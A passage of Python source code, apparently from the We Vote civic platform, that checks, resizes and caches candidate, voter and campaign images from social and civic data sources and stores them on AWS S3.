kind_of_image_facebook_background=kind_of_image_facebook_background,
kind_of_image_maplight=kind_of_image_maplight,
kind_of_image_vote_smart=kind_of_image_vote_smart,
kind_of_image_ballotpedia_profile=kind_of_image_ballotpedia_profile,
kind_of_image_campaignx_photo=kind_of_image_campaignx_photo,
kind_of_image_linkedin_profile=kind_of_image_linkedin_profile,
kind_of_image_wikipedia_profile=kind_of_image_wikipedia_profile,
kind_of_image_other_source=kind_of_image_other_source,
kind_of_image_tiny=True,
image_offset_x=image_offset_x,
image_offset_y=image_offset_y,
other_source=other_source)
create_resized_image_results['cached_tiny_image'] = cache_resized_image_locally_results['success']
else:
create_resized_image_results['cached_tiny_image'] = IMAGE_ALREADY_CACHED
return create_resized_image_results
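# Illustrative usage sketch for create_resized_image_if_not_created(): pass one WeVoteImage entry
# (the retrieval call below is just one assumed way to obtain such an entry). Each 'cached_*' value
# is True or False for a fresh attempt, or IMAGE_ALREADY_CACHED when a resized version already existed.
#
#     for one_image in retrieve_all_images_for_one_voter(12345):
#         resize_results = create_resized_image_if_not_created(one_image)
#         if resize_results['cached_large_image'] is True:
#             print("large image cached for", resize_results['voter_we_vote_id'])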
def check_resized_version_exists(
voter_we_vote_id=None,
campaignx_we_vote_id=None,
candidate_we_vote_id=None,
organization_we_vote_id=None,
image_url_https=None,
kind_of_image_twitter_profile=False,
kind_of_image_twitter_background=False,
kind_of_image_twitter_banner=False,
kind_of_image_facebook_profile=False,
kind_of_image_facebook_background=False,
kind_of_image_maplight=False,
kind_of_image_vote_smart=False,
kind_of_image_campaignx_photo=False,
kind_of_image_ballotpedia_profile=False,
kind_of_image_linkedin_profile=False,
kind_of_image_wikipedia_profile=False,
kind_of_image_other_source=False):
"""
    Check whether large, medium, or tiny image versions already exist
:param voter_we_vote_id:
:param campaignx_we_vote_id:
:param candidate_we_vote_id:
:param organization_we_vote_id:
:param image_url_https:
:param kind_of_image_twitter_profile:
:param kind_of_image_twitter_background:
:param kind_of_image_twitter_banner:
:param kind_of_image_facebook_profile:
:param kind_of_image_facebook_background:
:param kind_of_image_maplight:
:param kind_of_image_vote_smart:
:param kind_of_image_ballotpedia_profile:
:param kind_of_image_campaignx_photo:
:param kind_of_image_linkedin_profile:
:param kind_of_image_wikipedia_profile:
:param kind_of_image_other_source:
:return:
"""
results = {
'medium_image_version_exists': False,
'tiny_image_version_exists': False,
'large_image_version_exists': False
}
we_vote_image_list_results = {
'we_vote_image_list': [],
}
we_vote_image_manager = WeVoteImageManager()
if kind_of_image_twitter_profile:
we_vote_image_list_results = we_vote_image_manager.retrieve_we_vote_image_list_from_url(
voter_we_vote_id, candidate_we_vote_id, organization_we_vote_id,
twitter_profile_image_url_https=image_url_https)
elif kind_of_image_twitter_background:
we_vote_image_list_results = we_vote_image_manager.retrieve_we_vote_image_list_from_url(
voter_we_vote_id, candidate_we_vote_id, organization_we_vote_id,
twitter_profile_background_image_url_https=image_url_https)
elif kind_of_image_twitter_banner:
we_vote_image_list_results = we_vote_image_manager.retrieve_we_vote_image_list_from_url(
voter_we_vote_id, candidate_we_vote_id, organization_we_vote_id,
twitter_profile_banner_url_https=image_url_https)
elif kind_of_image_facebook_profile:
we_vote_image_list_results = we_vote_image_manager.retrieve_we_vote_image_list_from_url(
voter_we_vote_id, candidate_we_vote_id, organization_we_vote_id,
facebook_profile_image_url_https=image_url_https)
elif kind_of_image_facebook_background:
we_vote_image_list_results = we_vote_image_manager.retrieve_we_vote_image_list_from_url(
voter_we_vote_id, candidate_we_vote_id, organization_we_vote_id,
facebook_background_image_url_https=image_url_https)
elif kind_of_image_maplight:
we_vote_image_list_results = we_vote_image_manager.retrieve_we_vote_image_list_from_url(
voter_we_vote_id, candidate_we_vote_id, organization_we_vote_id,
maplight_image_url_https=image_url_https)
elif kind_of_image_vote_smart:
we_vote_image_list_results = we_vote_image_manager.retrieve_we_vote_image_list_from_url(
voter_we_vote_id, candidate_we_vote_id, organization_we_vote_id,
vote_smart_image_url_https=image_url_https)
elif kind_of_image_ballotpedia_profile:
we_vote_image_list_results = we_vote_image_manager.retrieve_we_vote_image_list_from_url(
voter_we_vote_id, candidate_we_vote_id, organization_we_vote_id,
ballotpedia_profile_image_url=image_url_https)
elif kind_of_image_campaignx_photo:
we_vote_image_list_results = we_vote_image_manager.retrieve_we_vote_image_list_from_url(
campaignx_we_vote_id,
campaignx_photo_url_https=image_url_https)
elif kind_of_image_linkedin_profile:
we_vote_image_list_results = we_vote_image_manager.retrieve_we_vote_image_list_from_url(
voter_we_vote_id, candidate_we_vote_id, organization_we_vote_id,
linkedin_profile_image_url=image_url_https)
elif kind_of_image_wikipedia_profile:
we_vote_image_list_results = we_vote_image_manager.retrieve_we_vote_image_list_from_url(
voter_we_vote_id, candidate_we_vote_id, organization_we_vote_id,
wikipedia_profile_image_url=image_url_https)
elif kind_of_image_other_source:
we_vote_image_list_results = we_vote_image_manager.retrieve_we_vote_image_list_from_url(
voter_we_vote_id, candidate_we_vote_id, organization_we_vote_id,
other_source_image_url=image_url_https)
we_vote_image_list = we_vote_image_list_results['we_vote_image_list']
for we_vote_image in we_vote_image_list:
if we_vote_image.we_vote_image_url is None or we_vote_image.we_vote_image_url == "":
# if we_vote_image_url is empty then delete that entry
delete_we_vote_image_results = we_vote_image_manager.delete_we_vote_image(we_vote_image)
elif we_vote_image.kind_of_image_medium:
results['medium_image_version_exists'] = True
elif we_vote_image.kind_of_image_tiny:
results['tiny_image_version_exists'] = True
elif we_vote_image.kind_of_image_large:
results['large_image_version_exists'] = True
return results
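# Illustrative usage sketch for check_resized_version_exists(): the we_vote_id and Twitter image url
# below are assumed placeholders. Only the kind_of_image_* flag matching the url should be True.
#
#     exists_results = check_resized_version_exists(
#         voter_we_vote_id='wv01voter1234',
#         image_url_https='https://pbs.twimg.com/profile_images/example.jpg',
#         kind_of_image_twitter_profile=True)
#     if not exists_results['large_image_version_exists']:
#         print("large resized version still needs to be created")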
def cache_resized_image_locally(
google_civic_election_id,
image_url_https,
we_vote_parent_image_id,
voter_we_vote_id=None,
candidate_we_vote_id=None,
campaignx_we_vote_id=None,
organization_we_vote_id=None,
issue_we_vote_id=None,
twitter_id=None,
image_format=None,
facebook_user_id=None,
other_source=None,
maplight_id=None,
vote_smart_id=None,
is_active_version=True,
kind_of_image_twitter_profile=False,
kind_of_image_twitter_background=False,
kind_of_image_twitter_banner=False,
kind_of_image_facebook_profile=False,
kind_of_image_facebook_background=False,
kind_of_image_maplight=False,
kind_of_image_vote_smart=False,
kind_of_image_issue=False,
kind_of_image_ballotpedia_profile=False,
kind_of_image_campaignx_photo=False,
kind_of_image_linkedin_profile=False,
kind_of_image_wikipedia_profile=False,
kind_of_image_other_source=False,
kind_of_image_original=False,
kind_of_image_large=False,
kind_of_image_medium=False,
kind_of_image_tiny=False,
image_offset_x=0,
image_offset_y=0):
"""
    Resize the image according to the requested image version and cache the resized copy
:param google_civic_election_id:
:param image_url_https:
:param we_vote_parent_image_id:
:param voter_we_vote_id:
:param campaignx_we_vote_id:
:param candidate_we_vote_id:
:param organization_we_vote_id:
:param issue_we_vote_id:
:param twitter_id:
:param image_format:
:param facebook_user_id:
:param other_source: # can be MapLight or VoteSmart
:param maplight_id:
:param vote_smart_id:
:param is_active_version:
:param kind_of_image_twitter_profile:
:param kind_of_image_twitter_background:
:param kind_of_image_twitter_banner:
:param kind_of_image_facebook_profile:
:param kind_of_image_facebook_background:
:param kind_of_image_maplight:
:param kind_of_image_vote_smart:
:param kind_of_image_issue:
:param kind_of_image_ballotpedia_profile:
:param kind_of_image_campaignx_photo:
:param kind_of_image_linkedin_profile:
:param kind_of_image_wikipedia_profile:
:param kind_of_image_other_source:
:param kind_of_image_original:
:param kind_of_image_large:
:param kind_of_image_medium:
:param kind_of_image_tiny:
:param image_offset_x: # For Facebook background
:param image_offset_y: # For Facebook background
:return:
"""
success = False
status = ''
we_vote_image_created = False
resized_image_created = False
image_stored_from_source = False
image_stored_locally = False
image_stored_to_aws = False
image_versions = []
we_vote_image_file_location = None
we_vote_image_manager = WeVoteImageManager()
# Set up image we will use for large, medium or tiny
create_we_vote_image_results = we_vote_image_manager.create_we_vote_image(
google_civic_election_id=google_civic_election_id,
voter_we_vote_id=voter_we_vote_id,
candidate_we_vote_id=candidate_we_vote_id,
campaignx_we_vote_id=campaignx_we_vote_id,
organization_we_vote_id=organization_we_vote_id,
issue_we_vote_id=issue_we_vote_id,
kind_of_image_twitter_profile=kind_of_image_twitter_profile,
kind_of_image_twitter_background=kind_of_image_twitter_background,
kind_of_image_twitter_banner=kind_of_image_twitter_banner,
kind_of_image_facebook_profile=kind_of_image_facebook_profile,
kind_of_image_facebook_background=kind_of_image_facebook_background,
kind_of_image_maplight=kind_of_image_maplight,
kind_of_image_vote_smart=kind_of_image_vote_smart,
kind_of_image_issue=kind_of_image_issue,
kind_of_image_ballotpedia_profile=kind_of_image_ballotpedia_profile,
kind_of_image_campaignx_photo=kind_of_image_campaignx_photo,
kind_of_image_linkedin_profile=kind_of_image_linkedin_profile,
kind_of_image_wikipedia_profile=kind_of_image_wikipedia_profile,
kind_of_image_other_source=kind_of_image_other_source,
kind_of_image_original=kind_of_image_original,
kind_of_image_large=kind_of_image_large,
kind_of_image_medium=kind_of_image_medium,
kind_of_image_tiny=kind_of_image_tiny)
status += create_we_vote_image_results['status']
if not create_we_vote_image_results['we_vote_image_saved']:
error_results = {
'success': success,
'status': status,
'we_vote_image_created': we_vote_image_created,
'image_stored_from_source': image_stored_from_source,
'image_stored_locally': image_stored_locally,
'resized_image_created': resized_image_created,
'image_stored_to_aws': image_stored_to_aws,
}
return error_results
we_vote_image_created = True
we_vote_image = create_we_vote_image_results['we_vote_image']
image_width = ''
image_height = ''
if kind_of_image_issue:
if kind_of_image_large:
image_width = ISSUES_IMAGE_LARGE_WIDTH
image_height = ISSUES_IMAGE_LARGE_HEIGHT
elif kind_of_image_medium:
image_width = ISSUES_IMAGE_MEDIUM_WIDTH
image_height = ISSUES_IMAGE_MEDIUM_HEIGHT
elif kind_of_image_tiny:
image_width = ISSUES_IMAGE_TINY_WIDTH
image_height = ISSUES_IMAGE_TINY_HEIGHT
elif kind_of_image_campaignx_photo:
if kind_of_image_large:
image_width = CAMPAIGN_PHOTO_LARGE_MAX_WIDTH
image_height = CAMPAIGN_PHOTO_LARGE_MAX_HEIGHT
elif kind_of_image_medium:
image_width = CAMPAIGN_PHOTO_MEDIUM_MAX_WIDTH
image_height = CAMPAIGN_PHOTO_MEDIUM_MAX_HEIGHT
elif kind_of_image_tiny:
image_width = CAMPAIGN_PHOTO_SMALL_MAX_WIDTH
image_height = CAMPAIGN_PHOTO_SMALL_MAX_HEIGHT
else:
if kind_of_image_large:
image_width = PROFILE_IMAGE_LARGE_WIDTH
image_height = PROFILE_IMAGE_LARGE_HEIGHT
elif kind_of_image_medium:
image_width = PROFILE_IMAGE_MEDIUM_WIDTH
image_height = PROFILE_IMAGE_MEDIUM_HEIGHT
elif kind_of_image_tiny:
image_width = PROFILE_IMAGE_TINY_WIDTH
image_height = PROFILE_IMAGE_TINY_HEIGHT
if kind_of_image_twitter_profile:
image_type = TWITTER_PROFILE_IMAGE_NAME
elif kind_of_image_twitter_background:
image_type = TWITTER_BACKGROUND_IMAGE_NAME
elif kind_of_image_twitter_banner:
image_type = TWITTER_BANNER_IMAGE_NAME
elif kind_of_image_facebook_profile:
image_type = FACEBOOK_PROFILE_IMAGE_NAME
elif kind_of_image_facebook_background:
image_type = FACEBOOK_BACKGROUND_IMAGE_NAME
image_height = SOCIAL_BACKGROUND_IMAGE_HEIGHT
image_width = SOCIAL_BACKGROUND_IMAGE_WIDTH
elif kind_of_image_maplight:
image_type = MAPLIGHT_IMAGE_NAME
elif kind_of_image_vote_smart:
image_type = VOTE_SMART_IMAGE_NAME
elif kind_of_image_issue:
image_type = ISSUE_IMAGE_NAME
elif kind_of_image_ballotpedia_profile:
image_type = BALLOTPEDIA_IMAGE_NAME
elif kind_of_image_campaignx_photo:
image_type = CAMPAIGNX_PHOTO_IMAGE_NAME
elif kind_of_image_linkedin_profile:
image_type = LINKEDIN_IMAGE_NAME
elif kind_of_image_wikipedia_profile:
image_type = WIKIPEDIA_IMAGE_NAME
elif kind_of_image_other_source:
image_type = other_source
else:
image_type = ''
# Get today's cached images and their versions so that image version can be calculated
cached_todays_we_vote_image_list_results = we_vote_image_manager.retrieve_todays_cached_we_vote_image_list(
voter_we_vote_id=voter_we_vote_id,
campaignx_we_vote_id=campaignx_we_vote_id,
candidate_we_vote_id=candidate_we_vote_id,
organization_we_vote_id=organization_we_vote_id,
issue_we_vote_id=issue_we_vote_id,
kind_of_image_twitter_profile=kind_of_image_twitter_profile,
kind_of_image_twitter_background=kind_of_image_twitter_background,
kind_of_image_twitter_banner=kind_of_image_twitter_banner,
kind_of_image_facebook_profile=kind_of_image_facebook_profile,
kind_of_image_facebook_background=kind_of_image_facebook_background,
kind_of_image_maplight=kind_of_image_maplight,
kind_of_image_vote_smart=kind_of_image_vote_smart,
kind_of_image_issue=kind_of_image_issue,
kind_of_image_ballotpedia_profile=kind_of_image_ballotpedia_profile,
kind_of_image_campaignx_photo=kind_of_image_campaignx_photo,
kind_of_image_linkedin_profile=kind_of_image_linkedin_profile,
kind_of_image_wikipedia_profile=kind_of_image_wikipedia_profile,
kind_of_image_other_source=kind_of_image_other_source,
kind_of_image_original=kind_of_image_original,
kind_of_image_large=kind_of_image_large,
kind_of_image_medium=kind_of_image_medium,
kind_of_image_tiny=kind_of_image_tiny)
for cached_we_vote_image in cached_todays_we_vote_image_list_results['we_vote_image_list']:
if cached_we_vote_image.same_day_image_version:
image_versions.append(cached_we_vote_image.same_day_image_version)
if image_versions:
same_day_image_version = max(image_versions) + 1
else:
same_day_image_version = 1
if kind_of_image_facebook_profile or kind_of_image_facebook_background:
# image url is valid so store source image of facebook to WeVoteImage
save_source_info_results = we_vote_image_manager.save_we_vote_image_facebook_info(
we_vote_image, facebook_user_id, image_width, image_height,
image_url_https, same_day_image_version, kind_of_image_facebook_profile,
kind_of_image_facebook_background)
elif kind_of_image_twitter_profile or kind_of_image_twitter_background or kind_of_image_twitter_banner:
# image url is valid so store source image of twitter to WeVoteImage
save_source_info_results = we_vote_image_manager.save_we_vote_image_twitter_info(
we_vote_image, twitter_id, image_width, image_height, image_url_https, same_day_image_version,
kind_of_image_twitter_profile, kind_of_image_twitter_background, kind_of_image_twitter_banner)
elif kind_of_image_maplight:
# image url is valid so store source image of maplight to WeVoteImage
save_source_info_results = we_vote_image_manager.save_we_vote_image_maplight_info(
we_vote_image, maplight_id, image_width, image_height, image_url_https, same_day_image_version,
kind_of_image_maplight)
elif kind_of_image_vote_smart:
        # image url is valid so store source image of vote smart to WeVoteImage
save_source_info_results = we_vote_image_manager.save_we_vote_image_vote_smart_info(
we_vote_image, vote_smart_id, image_width, image_height, image_url_https, same_day_image_version,
kind_of_image_vote_smart)
elif kind_of_image_issue:
# image url is valid so store source image of issue to WeVoteImage
save_source_info_results = we_vote_image_manager.save_we_vote_image_issue_info(
we_vote_image, image_width, image_height, image_url_https, same_day_image_version)
elif kind_of_image_ballotpedia_profile:
# image url is valid so store source image of ballotpedia to WeVoteImage
save_source_info_results = we_vote_image_manager.save_we_vote_image_ballotpedia_info(
we_vote_image, image_width, image_height, image_url_https, same_day_image_version,
kind_of_image_ballotpedia_profile)
elif kind_of_image_campaignx_photo:
# Update this new image with width, height, original url and version number
save_source_info_results = we_vote_image_manager.save_we_vote_image_campaignx_info(
we_vote_image=we_vote_image,
image_width=image_width,
image_height=image_height,
image_url_https=image_url_https,
same_day_image_version=same_day_image_version,
)
elif kind_of_image_linkedin_profile:
# image url is valid so store source image of linkedin to WeVoteImage
save_source_info_results = we_vote_image_manager.save_we_vote_image_linkedin_info(
we_vote_image, image_width, image_height, image_url_https, same_day_image_version,
kind_of_image_linkedin_profile)
elif kind_of_image_wikipedia_profile:
# image url is valid so store source image of wikipedia to WeVoteImage
save_source_info_results = we_vote_image_manager.save_we_vote_image_wikipedia_info(
we_vote_image, image_width, image_height, image_url_https, same_day_image_version,
kind_of_image_wikipedia_profile)
elif kind_of_image_other_source:
# image url is valid so store source image from other source to WeVoteImage
save_source_info_results = we_vote_image_manager.save_we_vote_image_other_source_info(
we_vote_image, image_width, image_height, other_source, image_url_https, same_day_image_version,
kind_of_image_other_source)
else:
save_source_info_results = {
'status': "KIND_OF_IMAGE_INVALID ",
'success': False,
'we_vote_image': None,
}
status += " " + save_source_info_results['status']
if save_source_info_results['success']:
image_stored_from_source = True
date_image_saved = "{year}{:02d}{:02d}".format(we_vote_image.date_image_saved.month,
we_vote_image.date_image_saved.day,
year=we_vote_image.date_image_saved.year)
# ex twitter_profile_image_master-2017210_1_48x48.png
we_vote_image_file_name = "{image_type}-{date_image_saved}_{counter}_" \
"{image_width}x{image_height}.{image_format}" \
"".format(image_type=image_type,
date_image_saved=date_image_saved,
counter=str(same_day_image_version),
image_width=str(image_width),
image_height=str(image_height),
image_format=str(image_format))
if voter_we_vote_id:
we_vote_image_file_location = voter_we_vote_id + "/" + we_vote_image_file_name
elif campaignx_we_vote_id:
we_vote_image_file_location = campaignx_we_vote_id + "/" + we_vote_image_file_name
elif candidate_we_vote_id:
we_vote_image_file_location = candidate_we_vote_id + "/" + we_vote_image_file_name
elif organization_we_vote_id:
we_vote_image_file_location = organization_we_vote_id + "/" + we_vote_image_file_name
elif issue_we_vote_id:
we_vote_image_file_location = issue_we_vote_id + "/" + we_vote_image_file_name
image_stored_locally = we_vote_image_manager.store_image_locally(
image_url_https, we_vote_image_file_name)
if not image_stored_locally:
error_results = {
'success': success,
'status': status + " IMAGE_NOT_STORED_LOCALLY ",
'we_vote_image_created': we_vote_image_created,
'image_stored_from_source': image_stored_from_source,
'image_stored_locally': False,
'resized_image_created': resized_image_created,
'image_stored_to_aws': image_stored_to_aws,
}
delete_we_vote_image_results = we_vote_image_manager.delete_we_vote_image(we_vote_image)
return error_results
status += " IMAGE_STORED_LOCALLY "
resized_image_created = we_vote_image_manager.resize_we_vote_master_image(
image_local_path=we_vote_image_file_name,
image_width=image_width,
image_height=image_height,
image_type=image_type,
image_offset_x=image_offset_x,
image_offset_y=image_offset_y)
if not resized_image_created:
error_results = {
'success': success,
'status': status + " IMAGE_NOT_STORED_LOCALLY ",
'we_vote_image_created': we_vote_image_created,
'image_stored_from_source': image_stored_from_source,
'image_stored_locally': image_stored_locally,
'resized_image_created': False,
'image_stored_to_aws': image_stored_to_aws,
}
delete_we_vote_image_results = we_vote_image_manager.delete_we_vote_image(we_vote_image)
return error_results
status += " RESIZED_IMAGE_CREATED "
image_stored_to_aws = we_vote_image_manager.store_image_to_aws(
we_vote_image_file_name, we_vote_image_file_location, image_format)
if not image_stored_to_aws:
error_results = {
'success': success,
'status': status + " IMAGE_NOT_STORED_TO_AWS",
'we_vote_image_created': we_vote_image_created,
'image_stored_from_source': image_stored_from_source,
'image_stored_locally': image_stored_locally,
'resized_image_created': resized_image_created,
'image_stored_to_aws': False,
}
delete_we_vote_image_results = we_vote_image_manager.delete_we_vote_image(we_vote_image)
return error_results
we_vote_image_url = "https://{bucket_name}.s3.amazonaws.com/{we_vote_image_file_location}" \
"".format(bucket_name=AWS_STORAGE_BUCKET_NAME,
we_vote_image_file_location=we_vote_image_file_location)
        # if we_vote_image_url is not empty then save we_vote_image aws info, else delete the we_vote_image entry
if we_vote_image_url is not None and we_vote_image_url != "":
save_aws_info = we_vote_image_manager.save_we_vote_image_aws_info(
we_vote_image=we_vote_image,
we_vote_image_url=we_vote_image_url,
we_vote_image_file_location=we_vote_image_file_location,
we_vote_parent_image_id=we_vote_parent_image_id,
is_active_version=is_active_version)
else:
status += " WE_VOTE_IMAGE_URL_IS_EMPTY"
error_results = {
'success': success,
'status': status,
'we_vote_image_created': we_vote_image_created,
'image_stored_from_source': image_stored_from_source,
'image_stored_locally': image_stored_locally,
'resized_image_created': resized_image_created,
'image_stored_to_aws': image_stored_to_aws,
}
delete_we_vote_image_results = we_vote_image_manager.delete_we_vote_image(we_vote_image)
return error_results
status += " IMAGE_STORED_TO_AWS " + save_aws_info['status']
success = save_aws_info['success']
if not success:
error_results = {
'success': success,
'status': status,
'we_vote_image_created': we_vote_image_created,
'image_stored_from_source': image_stored_from_source,
'image_stored_locally': image_stored_locally,
'resized_image_created': resized_image_created,
'image_stored_to_aws': image_stored_to_aws,
}
delete_we_vote_image_results = we_vote_image_manager.delete_we_vote_image(we_vote_image)
return error_results
else:
error_results = {
'success': success,
'status': status,
'we_vote_image_created': we_vote_image_created,
'image_stored_from_source': False,
'image_stored_locally': image_stored_locally,
'resized_image_created': resized_image_created,
'image_stored_to_aws': image_stored_to_aws,
}
delete_we_vote_image_results = we_vote_image_manager.delete_we_vote_image(we_vote_image)
return error_results
results = {
'success': success,
'status': status,
'we_vote_image_created': we_vote_image_created,
'image_stored_from_source': image_stored_from_source,
'image_stored_locally': image_stored_locally,
'resized_image_created': resized_image_created,
'image_stored_to_aws': image_stored_to_aws,
}
return results
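# Illustrative usage sketch for cache_resized_image_locally(): the first arguments are the
# google_civic_election_id, the source image url, and the id of the parent WeVoteImage; the values
# below are assumed placeholders. Exactly one size flag (kind_of_image_large / _medium / _tiny) is
# normally passed per call, as in create_resized_image_if_not_created() above.
#
#     resize_results = cache_resized_image_locally(
#         0,
#         'https://pbs.twimg.com/profile_images/example.jpg',
#         we_vote_parent_image_id=1234,
#         voter_we_vote_id='wv01voter1234',
#         twitter_id=99999,
#         image_format='jpg',
#         kind_of_image_twitter_profile=True,
#         kind_of_image_large=True)
#     print(resize_results['resized_image_created'], resize_results['image_stored_to_aws'])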
def create_resized_images(
voter_we_vote_id=None,
campaignx_we_vote_id=None,
candidate_we_vote_id=None,
organization_we_vote_id=None,
twitter_profile_image_url_https=None,
twitter_profile_background_image_url_https=None,
twitter_profile_banner_url_https=None,
facebook_profile_image_url_https=None,
facebook_background_image_url_https=None,
maplight_image_url_https=None,
vote_smart_image_url_https=None,
ballotpedia_profile_image_url=None,
campaignx_photo_url_https=None,
linkedin_profile_image_url=None,
wikipedia_profile_image_url=None,
other_source_image_url=None):
"""
Create resized images
:param voter_we_vote_id:
:param campaignx_we_vote_id:
:param candidate_we_vote_id:
:param organization_we_vote_id:
:param twitter_profile_image_url_https:
:param twitter_profile_background_image_url_https:
:param twitter_profile_banner_url_https:
:param facebook_profile_image_url_https:
:param facebook_background_image_url_https:
:param maplight_image_url_https:
:param vote_smart_image_url_https:
:param ballotpedia_profile_image_url:
:param campaignx_photo_url_https:
:param linkedin_profile_image_url:
:param wikipedia_profile_image_url:
:param other_source_image_url:
:return:
"""
cached_master_image_url = None
cached_resized_image_url_large = None
cached_resized_image_url_medium = None
cached_resized_image_url_tiny = None
we_vote_image_manager = WeVoteImageManager()
# Retrieve cached master image url from WeVoteImage table
cached_we_vote_image_results = we_vote_image_manager.retrieve_we_vote_image_from_url(
voter_we_vote_id=voter_we_vote_id,
campaignx_we_vote_id=campaignx_we_vote_id,
candidate_we_vote_id=candidate_we_vote_id,
organization_we_vote_id=organization_we_vote_id,
twitter_profile_image_url_https=twitter_profile_image_url_https,
twitter_profile_background_image_url_https=twitter_profile_background_image_url_https,
twitter_profile_banner_url_https=twitter_profile_banner_url_https,
facebook_profile_image_url_https=facebook_profile_image_url_https,
facebook_background_image_url_https=facebook_background_image_url_https,
maplight_image_url_https=maplight_image_url_https,
vote_smart_image_url_https=vote_smart_image_url_https,
ballotpedia_profile_image_url=ballotpedia_profile_image_url,
campaignx_photo_url_https=campaignx_photo_url_https,
linkedin_profile_image_url=linkedin_profile_image_url,
wikipedia_profile_image_url=wikipedia_profile_image_url,
other_source_image_url=other_source_image_url,
kind_of_image_original=True)
if cached_we_vote_image_results['success']:
cached_we_vote_image = cached_we_vote_image_results['we_vote_image']
cached_master_image_url = cached_we_vote_image.we_vote_image_url
# Create resized image if not created before
create_resized_image_results = create_resized_image_if_not_created(cached_we_vote_image)
# Retrieve resized large version image url
if create_resized_image_results['cached_large_image']:
cached_resized_we_vote_image_results = we_vote_image_manager.retrieve_we_vote_image_from_url(
voter_we_vote_id=voter_we_vote_id,
campaignx_we_vote_id=campaignx_we_vote_id,
candidate_we_vote_id=candidate_we_vote_id,
organization_we_vote_id=organization_we_vote_id,
twitter_profile_image_url_https=twitter_profile_image_url_https,
twitter_profile_background_image_url_https=twitter_profile_background_image_url_https,
twitter_profile_banner_url_https=twitter_profile_banner_url_https,
facebook_profile_image_url_https=facebook_profile_image_url_https,
facebook_background_image_url_https=facebook_background_image_url_https,
maplight_image_url_https=maplight_image_url_https,
vote_smart_image_url_https=vote_smart_image_url_https,
ballotpedia_profile_image_url=ballotpedia_profile_image_url,
campaignx_photo_url_https=campaignx_photo_url_https,
linkedin_profile_image_url=linkedin_profile_image_url,
wikipedia_profile_image_url=wikipedia_profile_image_url,
other_source_image_url=other_source_image_url,
kind_of_image_large=True)
if cached_resized_we_vote_image_results['success']:
cached_resized_we_vote_image = cached_resized_we_vote_image_results['we_vote_image']
cached_resized_image_url_large = cached_resized_we_vote_image.we_vote_image_url
if create_resized_image_results['cached_medium_image']:
# Retrieve resized medium version image url
cached_resized_we_vote_image_results = we_vote_image_manager.retrieve_we_vote_image_from_url(
voter_we_vote_id=voter_we_vote_id,
campaignx_we_vote_id=campaignx_we_vote_id,
candidate_we_vote_id=candidate_we_vote_id,
organization_we_vote_id=organization_we_vote_id,
twitter_profile_image_url_https=twitter_profile_image_url_https,
twitter_profile_background_image_url_https=twitter_profile_background_image_url_https,
twitter_profile_banner_url_https=twitter_profile_banner_url_https,
facebook_profile_image_url_https=facebook_profile_image_url_https,
facebook_background_image_url_https=facebook_background_image_url_https,
maplight_image_url_https=maplight_image_url_https,
vote_smart_image_url_https=vote_smart_image_url_https,
ballotpedia_profile_image_url=ballotpedia_profile_image_url,
campaignx_photo_url_https=campaignx_photo_url_https,
linkedin_profile_image_url=linkedin_profile_image_url,
wikipedia_profile_image_url=wikipedia_profile_image_url,
other_source_image_url=other_source_image_url,
kind_of_image_medium=True)
if cached_resized_we_vote_image_results['success']:
cached_resized_we_vote_image = cached_resized_we_vote_image_results['we_vote_image']
cached_resized_image_url_medium = cached_resized_we_vote_image.we_vote_image_url
if create_resized_image_results['cached_tiny_image']:
# Retrieve resized tiny version image url
cached_resized_we_vote_image_results = we_vote_image_manager.retrieve_we_vote_image_from_url(
voter_we_vote_id=voter_we_vote_id,
campaignx_we_vote_id=campaignx_we_vote_id,
candidate_we_vote_id=candidate_we_vote_id,
organization_we_vote_id=organization_we_vote_id,
twitter_profile_image_url_https=twitter_profile_image_url_https,
twitter_profile_background_image_url_https=twitter_profile_background_image_url_https,
twitter_profile_banner_url_https=twitter_profile_banner_url_https,
facebook_profile_image_url_https=facebook_profile_image_url_https,
facebook_background_image_url_https=facebook_background_image_url_https,
maplight_image_url_https=maplight_image_url_https,
vote_smart_image_url_https=vote_smart_image_url_https,
ballotpedia_profile_image_url=ballotpedia_profile_image_url,
campaignx_photo_url_https=campaignx_photo_url_https,
linkedin_profile_image_url=linkedin_profile_image_url,
wikipedia_profile_image_url=wikipedia_profile_image_url, other_source_image_url=other_source_image_url,
kind_of_image_tiny=True)
if cached_resized_we_vote_image_results['success']:
cached_resized_we_vote_image = cached_resized_we_vote_image_results['we_vote_image']
cached_resized_image_url_tiny = cached_resized_we_vote_image.we_vote_image_url
results = {
'cached_master_image_url': cached_master_image_url,
'cached_resized_image_url_large': cached_resized_image_url_large,
'cached_resized_image_url_medium': cached_resized_image_url_medium,
'cached_resized_image_url_tiny': cached_resized_image_url_tiny
}
return results
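# Illustrative usage sketch for create_resized_images(): pass the identifier plus the original source
# image url whose cached master already exists; the values below are assumed placeholders. The
# returned urls stay None for any version that could not be found or created.
#
#     resized_urls = create_resized_images(
#         voter_we_vote_id='wv01voter1234',
#         twitter_profile_image_url_https='https://pbs.twimg.com/profile_images/example.jpg')
#     print(resized_urls['cached_master_image_url'])
#     print(resized_urls['cached_resized_image_url_large'])
#     print(resized_urls['cached_resized_image_url_medium'])
#     print(resized_urls['cached_resized_image_url_tiny'])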
def cache_master_and_resized_image(
twitter_id=None,
twitter_screen_name=None,
twitter_profile_image_url_https=None,
twitter_profile_background_image_url_https=None,
twitter_profile_banner_url_https=None,
voter_id=None,
voter_we_vote_id=None,
candidate_id=None,
candidate_we_vote_id=None,
organization_id=None,
organization_we_vote_id=None,
image_source=None,
facebook_user_id=None,
facebook_profile_image_url_https=None,
facebook_background_image_url_https=None,
facebook_background_image_offset_x=None,
facebook_background_image_offset_y=None,
maplight_id=None,
vote_smart_id=None,
maplight_image_url_https=None,
vote_smart_image_url_https=None,
ballotpedia_profile_image_url=None,
linkedin_profile_image_url=None,
wikipedia_profile_image_url=None,
other_source_image_url=None,
other_source=None):
"""
    Start with the URL of an image hosted on another server, cache it on the We Vote network along with
    re-sized versions, and return the cached urls.
:param twitter_id:
:param twitter_screen_name:
:param twitter_profile_image_url_https:
:param twitter_profile_background_image_url_https:
:param twitter_profile_banner_url_https:
:param voter_id:
:param voter_we_vote_id:
:param candidate_id:
:param candidate_we_vote_id:
:param organization_id:
:param organization_we_vote_id:
:param image_source: 2017-12-12 Currently not used within WeVoteServer
:param facebook_user_id:
:param facebook_profile_image_url_https:
:param facebook_background_image_url_https:
:param facebook_background_image_offset_x:
:param facebook_background_image_offset_y:
:param maplight_id:
:param vote_smart_id:
:param maplight_image_url_https:
:param vote_smart_image_url_https:
:param ballotpedia_profile_image_url:
:param linkedin_profile_image_url:
:param wikipedia_profile_image_url:
:param other_source_image_url:
:param other_source:
:return:
"""
cached_twitter_profile_image_url_https = None
cached_twitter_profile_background_image_url_https = None
